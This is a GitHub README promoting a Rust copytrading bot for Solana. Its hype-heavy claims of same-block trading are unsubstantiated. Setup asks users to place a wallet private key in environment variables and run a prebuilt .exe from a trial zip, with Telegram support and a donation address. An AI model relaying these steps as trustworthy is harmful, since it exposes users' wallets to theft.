Skip to content

πŸ’± Solana Copytrading botπŸš€: This solana copytrading bot is an advanced copytrading bot that has Rust version. Rust Copytrading Bot keeps less delay than Typescript Copytrading bot.

Notifications You must be signed in to change notification settings

jwest951227/solana-copytrading-bot-Rust

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Solana "Block-Speed" Copytrading Bot in Rust πŸš€

Overview

Tired of watching trades whiz by? Introducing the Solana Block-Speed Copytrading Bot in Rust πŸ¦€. This bot is engineered for extreme speed, letting you mirror trades in (potentially) the same block. Built from the ground up in Rust for peak performance and rock-solid reliability. Get ready to ride the wave!


Why This Bot Kicks Ass

⚑️ Rust: The Secret Sauce

  • Unleash the Speed: Rust is built for speed, and this bot demolishes latency. We're talking ultra-fast transaction parsing and lightning-quick RPC handling. You'll be trading faster than you can say "to the moon!"

🎯 Block-Level Action

  • Copycat in the Fast Lane: This bot is designed to copy trades with the potential to execute within the same block. That's right – you could be riding shotgun on every trade as it happens.

πŸ”’ Bulletproof Reliability

  • Rust's Got Your Back: Rust's memory safety and error handling mean a smoother, more reliable copytrading experience. Say goodbye to crashes and hello to consistent performance.

πŸ“‘ Real-Time Intel

  • Sniffing Out the Plays: We're using a fast and efficient data pipeline to stay on top of the action and keep you in the loop. No more missing the signal!

πŸ› οΈ Battle-Ready Features

  • Built to Win: We're packing essential tools for copytrading success:
    • Low-Latency Transactions: Nail those trades with speed on platforms like Raydium and Pump.fun.
    • Advanced Options: Designed to make your strategy the best it can be!

Directory Structure

src/
β”œβ”€β”€ core/
β”‚   β”œβ”€β”€ token.rs        # Token definitions and handling
β”‚   └── tx.rs        # Transaction handling
| 
β”œβ”€β”€ engine/
β”‚   β”œβ”€β”€ swap.rs        # Token swap(buy/sell) functionalities in various Dexs
β”‚   └── monitor.rs        # Target wallet monitoring(and parse tx) in Dexs using geyser rpc, and normal rpc
β”‚       
β”œβ”€β”€ dex/
β”‚   β”œβ”€β”€ pump_fun.rs        # Pump.fun
β”‚   β”œβ”€β”€ raydium.rs        # Raydium
β”‚   β”œβ”€β”€ meteora.rs        # Meteora
β”‚   └── orca.rs        # Orca
β”‚
β”œβ”€β”€ services/
β”‚   β”œβ”€β”€ jito.rs        # Jito service provides ultra-fast transaction confirmation
β”‚   └── nextblock.rs        # NextBlock service provides the ultra-fast transaction confirmation in unique way
|
β”œβ”€β”€ common/
|    β”œβ”€β”€ logger.rs        # Handles logging to be clean and convenient to monitor.
|    β”œβ”€β”€ config.rs        # Handles project configurations such as environment variables and constants.
|    β”œβ”€β”€ constants.rs        # Stores global constants used across the project.
|    β”œβ”€β”€ targetlist.rs     # Manages lists of targets such as URLs or files.
|    └── utils.rs          # Utility functions used across the project, including input/output operations, string manipulation, etc.
β”‚
β”œβ”€β”€ lib.rs
└── main.rs

Trial Version

πŸ—‚οΈ solana-raypump-copytrading-bot(r7m-trial).zip

How To Run

  1. Environment Variables Settings
PRIVATE_KEY=your_private_key_here
RPC_HTTPS=https://mainnet.helius-rpc.com/?api-key=your_api_key_here
RPC_WSS=wss://atlas-mainnet.helius-rpc.com/?api-key=your_api_key_here
SLIPPAGE=10
JITO_BLOCK_ENGINE_URL=https://ny.mainnet.block-engine.jito.wtf
JITO_TIP_STREAM_URL=ws://bundles-api-rest.jito.wtf/api/v1/bundles/tip_stream
JITO_TIP_PERCENTILE=50
JITO_TIP_VALUE=0.004
TOKEN_PERCENTAGE=1 #percentage
  1. List target wallet address into targetlist.txt.
  2. Run raypump-copytrading-bot.exe.

image

---[BUY]---

---[SELL]---


Donate

πŸ‘‰πŸ‘Œ 6vT7nrqtbXDWVc8cRUtifxgfDZi19aW7qhcZg2hSepwb


Support

For support and further inquiries, please connect via Telegram: πŸ“ž jwest951227.

About

πŸ’± Solana Copytrading botπŸš€: This solana copytrading bot is an advanced copytrading bot that has Rust version. Rust Copytrading Bot keeps less delay than Typescript Copytrading bot.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages